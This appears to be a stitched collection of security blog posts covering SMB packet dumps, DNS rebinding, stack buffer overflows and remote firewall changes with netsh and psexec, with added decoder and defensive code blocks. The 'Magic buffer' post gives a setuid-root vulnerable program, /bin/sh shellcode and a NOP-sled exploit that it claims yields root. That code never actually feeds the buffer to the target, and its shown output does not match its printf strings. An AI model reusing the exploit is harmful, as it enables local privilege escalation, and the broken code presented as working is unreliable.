
SMB

We connect to different Windows or Linux boxes for file sharing on a network without really bothering about what makes it happen. Well, Server Message Block (SMB) does exactly that. Its job is to be a client-server, request-response protocol.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX. Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

http://www.samba.org/cifs/docs/what-is-smb.html is a good reference to what SMB is all about.

Personally, I wanted to see what happens when I access any other Windows box using the UNC path (\\server\share). So I used the following scenario:

192.168.52.1 wants to talk to (share and access files on) 192.168.52.3

Here's what actually happened, courtesy of Ethereal dumps:

SMB Request:
0000 00 0c 29 58 26 61 00 50 56 c0 00 01 08 00 45 00 ..)X&a.P V.....E.
0010 00 b1 b6 88 40 00 80 06 5a 69 c0 a8 34 01 c0 a8 ....@... Zi..4...
0020 34 03 08 cc 01 bd 62 96 34 2a 7a cf e7 e7 50 18 4.....b. 4*z...P.
0030 ff ff f9 b6 00 00 00 00 00 85 ff 53 4d 42 72 00 ........ ...SMBr.
0040 00 00 00 18 53 c8 00 00 00 00 00 00 00 00 00 00 ....S... ........
0050 00 00 00 00 ff fe 00 00 00 00 00 62 00 02 50 43 ........ ...b..PC
0060 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d NETWORK PROGRAM
0070 20 31 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 00 1.0..LA NMAN1.0.
0080 02 57 69 6e 64 6f 77 73 20 66 6f 72 20 57 6f 72 .Windows for Wor
0090 6b 67 72 6f 75 70 73 20 33 2e 31 61 00 02 4c 4d kgroups 3.1a..LM
00a0 31 2e 32 58 30 30 32 00 02 4c 41 4e 4d 41 4e 32 1.2X002. .LANMAN2
00b0 2e 31 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 .1..NT L M 0.12.


SMB Response:
0000 00 50 56 c0 00 01 00 0c 29 58 26 61 08 00 45 00 .PV..... )X&a..E.
0010 00 81 00 4d 40 00 80 06 10 d5 c0 a8 34 03 c0 a8 ...M@... ....4...
0020 34 01 01 bd 08 cc 7a cf e7 e7 62 96 34 b3 50 18 4.....z. ..b.4.P.
0030 fa 67 4d 16 00 00 00 00 00 55 ff 53 4d 42 72 00 .gM..... .U.SMBr.
0040 00 00 00 98 53 c8 00 00 00 00 00 00 00 00 00 00 ....S... ........
0050 00 00 00 00 ff fe 00 00 00 00 11 05 00 03 0a 00 ........ ........
0060 01 00 04 11 00 00 00 00 01 00 00 00 00 00 fd e3 ........ ........
0070 00 80 e0 49 1f cb 33 df c7 01 a4 01 00 10 00 c4 ...I..3. ........
0080 80 db 7b 34 95 9e 45 9f 3a 4f 64 44 e0 a0 51 ..{4..E. :OdD..Q

One thing that is very clear is that Microsoft's implementation of SMB uses LANMAN (2.1 in this case).
The dumps show the packets flowing back and forth between the two boxes; we can see the NetBIOS headers along with the SMB headers and payloads.
Certainly makes some sense now.
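The exchange above decoded field by field, as an added example that is not part of the original post: the two TCP payloads are transcribed from the dumps into byte strings, the request's dialect list is walked in the order the client offered it, and the response's DialectIndex and SecurityMode are read, so the dialect the server settled on and its signing flags can be checked. Struct and function names are my own.

```c
/* Decoder for the Negotiate Protocol exchange captured above. Added example, not the blog's code.
 * Each PDU: 4-byte NetBIOS session header, 32-byte SMB header, WordCount, Words, ByteCount, Bytes. */
#include <stdint.h>
#include <string.h>
/* TCP payloads transcribed from the two Ethereal dumps, from the NetBIOS header onward */
static const uint8_t req[] =                /* use sizeof - 1: the literal appends one NUL */
    "\x00\x00\x00\x85\xffSMBr\x00\x00\x00\x00\x18\x53\xc8\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00"
    "\x02PC NETWORK PROGRAM 1.0\0\x02LANMAN1.0\0\x02Windows for Workgroups 3.1a\0"
    "\x02LM1.2X002\0\x02LANMAN2.1\0\x02NT LM 0.12\0";
static const uint8_t resp[] =
    "\x00\x00\x00\x55\xffSMBr\x00\x00\x00\x00\x98\x53\xc8\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
    "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
    "\x00\x00\x00\x00\xfd\xe3\x00\x80\xe0\x49\x1f\xcb\x33\xdf\xc7\x01\xa4\x01\x00"
    "\x10\x00\xc4\x80\xdb\x7b\x34\x95\x9e\x45\x9f\x3a\x4f\x64\x44\xe0\xa0\x51";
/* count/dialects: offered by the client in DialectIndex order; chosen: the server's DialectIndex;
 * security_mode bits: 0x04 signing enabled, 0x08 signing required */
struct negotiate { int count; const char *dialects[16]; int chosen; uint8_t security_mode; };
static struct negotiate neg;                /* result holder shared by the two parsers */
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
/* NetBIOS length must match the payload; SMB magic and the Negotiate command (0x72) must follow */
static int is_negotiate(const uint8_t *p, size_t len) {
    if (len < 39) return 0;
    size_t nb = (size_t)p[1] << 16 | (size_t)p[2] << 8 | p[3];
    return nb + 4 == len && !memcmp(p + 4, "\xffSMB", 4) && p[8] == 0x72;
}
/* Request: WordCount 0, then ByteCount and a list of 0x02 + NUL-terminated dialect names */
int parse_request(const uint8_t *p, size_t len, struct negotiate *n) {
    if (!is_negotiate(p, len) || p[36] != 0) return -1;
    size_t pos = 39, end = pos + le16(p + 37);
    if (end > len) return -1;
    for (n->count = 0; pos < end && n->count < 16; n->count++) {
        if (p[pos++] != 0x02) return -1;
        const uint8_t *z = memchr(p + pos, 0, end - pos);
        if (!z) return -1;                  /* unterminated name: reject the PDU */
        n->dialects[n->count] = (const char *)p + pos;
        pos = (size_t)(z - p) + 1;
    }
    return n->count;
}
/* Response in NT LM 0.12 form (WordCount 17): DialectIndex, then SecurityMode */
int parse_response(const uint8_t *p, size_t len, struct negotiate *n) {
    if (!is_negotiate(p, len) || p[36] != 17 || len < 73) return -1;
    n->chosen = le16(p + 37);
    n->security_mode = p[39];
    return n->chosen;
}
```

Feeding the response to parse_request (or the request to parse_response) returns -1, since the WordCount check tells the two PDUs apart.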


DNS rebinding attacks

Recently, I came across an article which revisited the concept of rebinding DNS queries; the methodology for the same was explained in a whitepaper from 1996 by Stanford students.

The way DNS rebinding attacks work is somewhat interesting.
Let's say I am logged onto my client box (aka victim) surfing the web. I come across an online ad which serves active content like Flash and JavaScript.
To perform a DNS rebinding attack, the bad guy answers DNS queries for their own domain with the IP address of their server, but with a very short time-to-live (TTL). Using JavaScript, or some other mechanism, the attacker initiates a second request to their domain from the victim's machine. Since the TTL has expired, another DNS query is sent to the attacker's DNS server. This time, the server responds with the IP address of a target server that the attacker wishes to connect to (e.g., an internal web server).
The beauty here is that firewalls are fooled into allowing this, since it is a legitimate request, and the machines on the corporate LAN are opened up to the bad outside world.

To avoid this, browsers do have a built-in mechanism called pinning, which associates DNS entries with their respective IP addresses for a fixed time period (30 minutes for Internet Explorer and 30-120 seconds for Mozilla Firefox).
Folks at Stanford carried out a demonstration wherein they set up an attacker that changed the IP address from its own to that of an internal machine, which was accepted by the victim boxes; over a span of 3 days or so these guys were able to obtain about 100.3 machine-days of network access.
The dangerous thing about DNS rebinding is that users don't have to click on malicious links; all they need to do is view the ad/webpage, which initiates the attack.
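A small model of the two defences mentioned above, as an added example that is not from the post: the pin keeps the first address for 30 minutes regardless of the record's TTL, and a resolver-side filter refuses any answer that maps an external name to a private address (dnsmasq's --stop-dns-rebind option does this). Host names and addresses are constructed, 203.0.113.0/24 being a documentation range, and the one-entry cache is a simplification.

```c
/* Model of browser DNS pinning plus a resolver-side rebinding filter. Added example, not the
 * blog's code; names and addresses are constructed (203.0.113.0/24 is a documentation range). */
#include <stdint.h>
#include <string.h>
#define PIN_SECONDS 1800            /* the 30-minute pin cited above for Internet Explorer */
enum verdict { V_FRESH, V_PINNED, V_BLOCKED };
/* One-entry pin cache, enough for the demo; a browser keeps one per host name */
static struct { char host[64]; uint32_t ip; long expires; } pin;
uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d) { return a << 24 | b << 16 | c << 8 | d; }
/* RFC 1918 and loopback space: an Internet-facing name has no business resolving here */
int is_private(uint32_t ip)
{
    return (ip >> 24) == 10 || (ip >> 24) == 127 || (ip >> 20) == 0xAC1 || (ip >> 16) == 0xC0A8;
}
/* answer: the A record the (attacker-controlled) DNS server gave for host right now, after the
 * short TTL forced a fresh query. Returns the address the client will use, or 0 when refused. */
uint32_t client_resolve(const char *host, uint32_t answer, long now, int pinning, int filter,
                        enum verdict *v)
{
    if (pinning && pin.host[0] && !strcmp(pin.host, host) && now < pin.expires) {
        *v = V_PINNED;                  /* the TTL has expired, the pin has not: keep the old IP */
        return pin.ip;
    }
    if (filter && is_private(answer)) { /* rebinding filter, e.g. dnsmasq --stop-dns-rebind */
        *v = V_BLOCKED;
        return 0;
    }
    strncpy(pin.host, host, sizeof pin.host - 1);
    pin.host[sizeof pin.host - 1] = '\0';
    pin.ip = answer;
    pin.expires = now + PIN_SECONDS;
    *v = V_FRESH;
    return answer;
}
/* Replays the sequence from the post: the first answer is the attacker's public server, the
 * second, sent once the TTL ran out, is an internal address. Returns -1 if the internal host
 * was reached, otherwise the verdict that stopped it. */
int rebinding_attempt(int pinning, int filter, long second_request_at)
{
    enum verdict v;
    const uint32_t internal = ip4(192, 168, 1, 10);
    memset(&pin, 0, sizeof pin);
    client_resolve("ad.attacker.example", ip4(203, 0, 113, 5), 0, pinning, filter, &v);
    uint32_t got = client_resolve("ad.attacker.example", internal, second_request_at, pinning, filter, &v);
    return got == internal ? -1 : (int)v;
}
```

With pinning alone the second request is still answered from the pin, but a request made after the pin expires goes through; the private-address filter catches that case too.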
Hope this was an interesting post; I will try to do this sometime in my lab just to see how it goes.

Peace.


Magic buffer

In the previous post, we checked out a brief overview of buffer overflow.
Let's actually try it out, making the program go where we want and execute code that can be used to gain root.
The difficult part here is to find out where the program should jump during execution; any wrong address and it will simply crash and burn.
Bytecode injection, a fancy term for what makes a buffer overflow actually work, is described here.

Let's take a sample program with the vulnerability, similar to the one in my previous post:

#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[500];
    strcpy(buffer, argv[1]); // Simply copying whatever argv[1] points at into buffer, with no length check
    return 0;
}

apache@apache:~/Desktop$ gcc -o vuln vuln.c
apache@apache:~/Desktop$ ./vuln test

It does nothing as of now except messing up memory on the box. To make it truly dangerous, we need to give it executable rights, change its ownership to root and turn the suid bit on.

apache@apache:~/Desktop$ sudo chown root vuln
apache@apache:~/Desktop$ sudo chmod +s vuln
apache@apache:~/Desktop$ ls -l vuln
-rwsr-sr-x 1 root users

This makes it exploitable via buffer overflow. Now we need a specially crafted buffer which can be fed to it. This buffer will carry the shellcode and will overwrite the return address on the stack so that the shellcode runs. The four bytes where the return address is stored must be overwritten with the address of the shellcode, which is somewhat daunting to get exactly right. If we use the NOP instruction (which basically does nothing but waste CPU cycles), we can get away with a relative address obtained by subtracting an offset from the stack pointer: when execution lands on a NOP, it simply moves on to the next location, and so on. So if we fill the start of our wonderful buffer with NOPs and the end with the relative address of the shellcode, we can run the code.

For your viewing pleasure:

| NOP bunch | Shellcode | Repeated return address |

Let's assume that the offset is 0, so the relative address is the stack pointer value.
The code for the exploit follows; I have put it in exploit.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)
{
    __asm__("movl %esp,%eax"); // Stack pointer is returned in EAX (32-bit x86 only; build with -m32 -O0)
}

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();         // current stack pointer goes in esp
    ret = esp - offset; // obviously
    printf("Stack pointer (ESP) : 0x%lx\n", esp);
    printf("Offset from ESP : 0x%x\n", offset);
    printf("Return address : 0x%lx\n", ret);

    buffer = malloc(600); // giving 600 bytes for buffer

    // Now we fill the buffer with the desired return address
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for (i = 0; i < 600; i += 4) // four because each address is four bytes wide
    {
        *(addr_ptr++) = ret;
    }

    for (i = 0; i < 200; i++) // Loop to fill the first 200 bytes of buffer with NOP
    {
        buffer[i] = '\x90';
    }

    // Put the shellcode in between
    ptr = buffer + 200;
    for (i = 0; i < (int) strlen(shellcode); i++) // copy loop; the original post omitted it for brevity
    {
        *(ptr++) = shellcode[i];
    }

    return 0;
}

Now to actually see if this works:

apache@apache:~/Desktop$ gcc -o exploit exploit.c
apache@apache:~/Desktop$ ./exploit

Output:
Stack pointer (ESP) : 0xbffff978
Offset from ESP:0x0
Desired return address:0xbffff978

Before the code:
apache@apache:~/Desktop$whoami
apache

After the code:
root@apache#whoami
root

Might seem complex at first, but if we think about it for a while... it does make sense.
Life is funny, isn't it?
Enough of buffer overflow; my next post will be something interesting and vibrant.




Art of buffer overflow

Buffer overflow is a very common and effective exploit to gain privileged access to a system. In brief, it means making a program do something it has no clue about, like executing some random instruction that crashes it, or abusing it to compromise privileges.
For example, let's say we want to carry out a buffer overflow where we fill an array beyond the capacity it is supposed to hold, say cramming 128 bytes into an array that is supposed to hold only 20 bytes.
The following C program illustrates the example:



#include <stdlib.h>
#include <string.h>

void buffer_overflow(char *s)
{
    char buffer[20]; /* Define an array of 20 bytes */
    strcpy(buffer, s); // Copy whatever the string pointer references, with no bounds check
}

int main(void)
{
    char big_buffer[128 + 1]; // Define an array of 128 bytes, plus room for the terminator
    int i;
    for (i = 0; i < 128; i++)
    {
        big_buffer[i] = 'A'; // Write all A's in the array
    }
    big_buffer[128] = '\0';
    buffer_overflow(big_buffer);
    exit(0);
}

On executing the code:

apache@apache:~/Desktop$ gcc -o overflow overflow.c
apache@apache:~/Desktop$ ./overflow
Segmentation fault

Once the program is executed, it crams the 20-byte array with a 128-byte value (all A's). The excess 108 bytes erase the saved stack pointer and return address and overwrite them with A's (0x41 in hexadecimal). So the code will try to jump to 0x41414141, which is some random garbage location in the program space, thereby causing the program to crash.

Suppose instead we make the program go to some defined location holding code that can gain privileged access to the box; this is what buffer overflow exploits do. They can spawn a root shell, make the box go crazy and any number of other things.
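A bounded replacement for the strcpy() call in buffer_overflow() above, as an added example that is not from the post: the copy is refused when the input would not fit in the 20-byte array together with its terminator, so the 128 A's never reach the saved frame. copy_bounded, buffer_checked and feed_128_As are names chosen here.

```c
/* The 20-byte array from buffer_overflow() with a bounded copy in place of strcpy().
 * Added example, not the blog's code: the size is checked before anything is written,
 * so the 128-byte input is rejected instead of overwriting the saved frame on the stack. */
#include <string.h>

#define BUF_SIZE 20

/* Copies src into dst only if it fits together with its terminator.
 * Returns the number of bytes copied, or -1 (and an empty dst) when it would overflow. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0) return -1;
    if (n >= dstsz) {          /* refuse rather than silently truncate, so callers notice */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* n bytes plus the terminator, all inside dst */
    return (int) n;
}

/* Hardened buffer_overflow(): same 20-byte local array, different copy */
int buffer_checked(const char *s)
{
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, s);
}

/* Replays main() from the post: 128 'A's (plus a terminator) through the checked path */
int feed_128_As(void)
{
    char big_buffer[128 + 1];
    memset(big_buffer, 'A', 128);
    big_buffer[128] = '\0';
    return buffer_checked(big_buffer);   /* -1: rejected, no overflow, no segfault */
}
```

Building the original with gcc -fstack-protector-strong would also turn the silent overwrite into an abort at function return, which is worth keeping on even once every copy is bounded.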

Hope this brings some clarity to the art of buffer overflow.


Wonderful netsh

Many a time, system admins need to open a port remotely to make an application run on a remote box. If there is a centralised network management tool, it certainly makes life easy, but what if I don't have anything to do it with?
There are many, many tools available that are free and do the trick; my personal favourite is the built-in Windows WMI functionality, which can be leveraged along with PsTools, which is free too.

Say I want to open a port like 5900 TCP (yup, VNC viewing) on an XP box named AVP-XP without logging into that box interactively.

Two things we need to do:
1. Connect to the remote box somehow.
2. Change the Windows Firewall settings to add that port remotely.

I make a batch file that uses the netshell functionality in Windows (which is very powerful for network-related tasks):

netsh firewall add portopening protocol=tcp port=5900 name=VNC

I will save it as addport.bat. Now, to execute this batch file on the remote box where we need to open the port:

The following I do from my system using the PsTools utility named psexec, which executes processes remotely:

C:\>psexec \\AVP-XP -c "c:\addport.bat" -u domain\username

It accepts the source path and user credentials to start the process on the remote system. Obviously, you need some sort of administrator privileges (domain admin in the case of a domain environment).
The same batch file can be wrapped in other scripts to execute it on a bunch of systems in one go, which I will try and do some day.
I hope this has been a useful read; it explains only a minuscule part of the power of netshell and remote network administration.
